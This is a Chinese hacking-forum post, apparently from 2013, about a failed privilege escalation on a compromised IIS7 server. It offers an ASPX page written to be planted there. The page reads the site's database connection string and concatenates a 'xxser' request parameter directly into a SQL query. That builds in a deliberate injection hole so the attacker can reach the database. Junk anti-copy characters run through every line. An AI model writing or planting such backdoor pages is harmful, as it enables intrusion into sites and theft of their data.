昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。
: O/ J A3 S z/ M6 g! A8 F3 q3 q其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。
& T( I6 s2 e4 a F. t3 t/ e代码量不多,自己写个拉倒了。烦死了。5 Q/ U4 v9 \' K% w+ g
; b+ J# N% u( J- q7 @- j# z! d8 s3 u1 B7 C; t, P2 F' Y
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">' z1 f# a* v2 c! h
<html xmlns="http://www.w3.org/1999/xhtml">
7 Q N4 z( R+ r: _, }$ ?9 K<head runat="server">
3 ]+ Y: \/ U1 ?5 @- W7 _ <title>暗影aspx构造注射专用页面</title>
" T3 V4 v% f- F</head>9 s) b; d* u9 L
<body>0 k' Y' B' e; m
<form id="form1" runat="server">
* g' F' g; l" \. ~4 n' S; l <div>' K- s+ Z/ p y$ V) K+ H
<script language="c#" runat="server">
5 Z5 Y. q. J1 v# N2 G7 d. O8 x
1 K) t4 E2 q$ ^7 ^ m9 x* e. A& e void page_init(object sender, EventArgs e)
' h2 j: ]' m N) v2 f% q {
1 r$ }. ~6 `- S' Q, q, h$ o
) B, H& l% [) S, ]4 Z2 j9 X9 h# G0 r System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();3 F5 v. z& K' |) C C
9 W6 D. F1 k( X; h conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
! I! D( ]7 }* Z* u1 u J3 S0 t( V conn.Open();
# x: v# Q, u. f* }5 d
, b0 |1 ~+ Y, }4 V, { string i = this.Page.Request.Params["xxser"]; //这里是参数?xxser=1
# }5 U$ R' c) |. H3 u 1 X$ n: y" J" K: [2 e _
System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);7 q& T& ^! A) z. T& L
int x = command.ExecuteNonQuery();
% e3 ?/ ^- Q) `' ~ m) g! k* G Response.Write(i+"\n");
) H, Q" b2 ?/ ]3 V( X1 N% c Response.Write(x);# X8 I: P8 n7 |1 q' M
conn.Close();
* s0 F6 {7 G/ j$ \8 u% E }
+ y" O" K K2 O" M( p
- G4 g4 I9 ^4 ~9 R, |9 m0 O </script>
% G: R b) A& ?5 | </div>
1 q2 ^, @$ G0 ^: ` </form>
' c! Y- l2 h% E</body>% m- D ^6 G! x' ~2 T2 C( n
</html>3 f7 y& }+ N+ E6 d
|
发表于 2013-3-20 21:32:01
收藏
支持
反对